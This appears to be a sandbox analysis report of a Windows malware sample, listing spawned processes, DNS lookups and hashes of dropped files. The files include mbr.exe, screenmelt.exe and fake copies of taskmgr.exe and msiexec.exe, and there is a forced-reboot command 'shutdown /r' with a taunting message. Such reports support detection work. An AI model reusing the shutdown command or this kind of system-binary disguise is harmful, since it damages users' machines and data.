"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=russian+democratic+federative+republic

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=moskau+moskau

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1

C:\Windows\system32\shutdown.exe

shutdown /r /t 3 /c "id like to see you fix this lol"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1

C:\Windows\System32\PickerHost.exe

C:\Windows\System32\PickerHost.exe -Embedding

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3a3c855 /state1:0x41c64e6d

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 www.google.com udp

Files

C:\Users\Admin\Downloads\user.bmp

MD5 bce2c2fff9af8eb17db5fb8ec2f8468c
SHA1 b509ac36b55378e6cb985b5b6361bc7e6ff09c64
SHA256 63d356735b63778fdf39861fe03155e3766bcab0825074d72a540d1a309e12fe
SHA512 22baf89fc7b249e3fad8ffdeb6a67316e0a28b8e9a2e10cccca0ab99c31a40e8c2836b876ce3501706196d2303b88b52cc29e107b894eb9d3b1addbedfaf8d68

C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat

MD5 4a79415752ab6e7d4706620f91e372b0
SHA1 830c6d1a491031f57b7827dc23fdb3fb1b066dcb
SHA256 7f4a90cb061298868b15088311358326bbf9762d738b0238f61fe6372d80d4a0
SHA512 f0ea1c15e6f10e8ec012e9bd9ee4f2afc2b229ef508cd29ce498d44091ecdc14f13f34fe07ccae3f6e68c5a3da0b2202a94078d0b19cc159a82ef601a413c6b6

C:\Users\Admin\downloads\colorcmd.exe

MD5 f07ad62ffe36c3350f14186618dffea4
SHA1 01372c5536edd2c0ad51df9d3cf51237f122384f
SHA256 31dee760b868645ad0f4e7270ec54942d01b1a7df769f04e52948b32e681a346
SHA512 3302acab75c14295ab9aadde5d25d8ffc7795e1e15357614692489a6e0edf86d2f5e464917251834d27b3ad95f262d3bc3088479a957fe2bf691b1066ced6406

C:\Users\Admin\downloads\screenmelt.exe

MD5 906a6d30ea07a63b252c21ff4e8cf785
SHA1 cceae82b6a75838a038096cf8dd721369764e113
SHA256 0850c8ca4e063475b6d83171b28eaaf1aec4452814a6c2e07acfc6f9df1d0359
SHA512 dafb680429cfe5db8dc9528a3f515e1e9e18289c97bb6cbcf612934ba441d97a60392878ee3554bfa3f0ecc40b49f4db4fef6bc3895681d4fa8c563a1a43c334

C:\Users\Admin\downloads\mbr.exe

MD5 8562ed46d745dceb3cc268693ca25c83
SHA1 309067f0c9703084654495a47e67f7a40824700d
SHA256 ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c
SHA512 52f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b

C:\Users\Admin\downloads\taskmgr.exe

MD5 12c0b030ad5d135dce89d85becfdb76f
SHA1 f8afc5bb441b54a0b4dcb66e158abd44187a43fe
SHA256 8436fcc98e61ea958dd6adf346a81c5d08cb91e9d9a6cc67cacf4f1b14db13b9
SHA512 710f39020f9e06d087d7ff55fe887203716a24080e368dbaa837421f8874fc35f0d39ac1634bfaa60d4fee4c93f4699872c725e63d759dfd81dc751a56ead61a

C:\Users\Admin\downloads\mmc.exe

MD5 1568445f077482ac1d17a82403236a50
SHA1 ab42cb00af4f08629c30af053325e0bc3332659b
SHA256 584c00a54afbf23413fd3d39a06d07c0ae811965e5670ebc5d8abad70a594ce5
SHA512 83941d9ec3e89d4301405800afc3140e3406cbf2d405e1fe886136ecb669375fcd9e2adfdfeb897c4603d8220db374e63444608accd8ba4ba3a7dbd7aac0d6ca

C:\Users\Admin\downloads\winntcus64.png

MD5 6630a0fb912cd00e64f2014401094beb
SHA1 e869c10b7f664332a1274e6de8812d4dc21d1bdc
SHA256 2b8c4658c0f5b47bab5f6ba1135d7d5a8d31414cf788b8fa7c4c520d1db92ba2
SHA512 6c7b97f677d43d22b1a2d7a12421f7fbcf4bb0017647dab846052560c0b1792ee1cdc8220a29eec9f5ab6f23be51b2c375101353e2c2112c492f59c7a701af87

C:\Users\Admin\downloads\msiexec.exe

MD5 a968951f4f6aeec3eb1aa67b82fdcee9
SHA1 52d40548aaed7604709f78da62f7c22810e05cf3
SHA256 79b1ba6b9959dfe0289ff1182cf2ecb130f8568dd67a4fec6b6b8464dbfb4446
SHA512 bba1caf8e2173a082e220eec1f1b5da880d39afca353cfafe8a7850d4a7d85e1ec0ff771bffb440afdc475eef50f9b720b5a3e9aea6c6cd2b3a8486a1681df3a

C:\Users\Admin\downloads\winnt64.exe

MD5 aa992d93467882ff211f211495e6c545
SHA1 75a1a182af719168b9ca7b9c42282b997f82d443
SHA256 dadd54e1c3b0496d3a49e112da7c3d71255037df9ba27b890131330b42eabf88
SHA512 54d07b5f123b20128459de04694ed295275498c646fef596830c2c98ff1a8fa4741c95ce72be6d59a713fc6d7d7365c4f13eace2ed6bf357ebef44885b882d5d

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8f2eb94e31cadfb6eb07e6bbe61ef7ae
SHA1 3f42b0d5a90408689e7f7941f8db72a67d5a2eab
SHA256 d222c8e3b19cda2657629a486faf32962e016fc66561ce0d17010afdb283c9de
SHA512 9f7f84149885b851e0bf7173c540e466a2b2eb9907d8b608f60360933328cc75d9d1b63640ea4ecc1e64ecc5dd7ee74d82903f96a8b4418ca56296641a8c0703

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d56e8f308a28ac4183257a7950ab5c89
SHA1 044969c58cef041a073c2d132fa66ccc1ee553fe
SHA256 0bc24451c65457abc1e4e340be2f8faceae6b6ec7768a21d44bcd14636543bae
SHA512 fd5798559f4025ec3408f5550b8671d394b1ec83b85fdac8c005b0cc3e183272bdd07db15a156a572c9c5e5798badf235dc10aae62a052efa8dd9dfdbdca8189

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62ec395204e0aae9915a3b732f94082d
SHA1 ad6020612c27b62c0e590459c4f36aaf2ed7c138
SHA256 dd585d49302ad327220f0bd5d682f83498a501539a9ff1057f2a9c993ddc723b
SHA512 430cafa8b002e2d6041c4ac74f8588f6436659a48fe063abbe6e38d440ed04ca795fd001a296b83bc9476c76feabd22dae4da8e557e468abbd909fa905e7717c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 01cae2936004d4a9e2099ae92bb8520c
SHA1 980fa86f666537e848dfac4a7f76c3afa5255dd4
SHA256 fae06ad03e25a3f2a2046556aa51c19f086bbef6ead452ff6330be346a07ccd6
SHA512 e11bfe642e00f97b75b2cdad55452bd06ccbf3f94ff102ac79486eead74f6e5375695230eee14ff1ca3b21fa109319385964012dd2817812d412033a1e184d1c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fc60e2e1f4ebe524fc3ee72a6c9f68a4
SHA1 e2e57f927c2e20b22151e40b4513f0e703dc0edf
SHA256 ed7b39b8d905b6602f449271007e9fa5ce8cd4d4154d985d74c6772655d359ab
SHA512 4c8a611d5104da9b99f5b815c3abaf1aacb44ca22ab0ee31fcdee6673a192e8da2f4523403fa9d1dacfb3c4b9a3e18b2282ff036ed04e44788432e81e851ac2a

C:\Users\Public\Desktop\ISEEYOU6.prsnlz

MD5 f2c62761eaf03a1477f392a23a2b951d
SHA1 243ae1c1ec3377cf835efb728180dfd19567d2f2
SHA256 f033d117272cafc4072c2a9e6986381939f19eebe57d08be26834f752a9c4a18
SHA512 d7eaf3915aadaf5b0d2cb7ca740b8bbd8ce93f809ebf39e92e4934c96d44020a631787aeec3e28c290a51c01c91a5044f3d4b679d8451fd8a1cdc871a5e47c27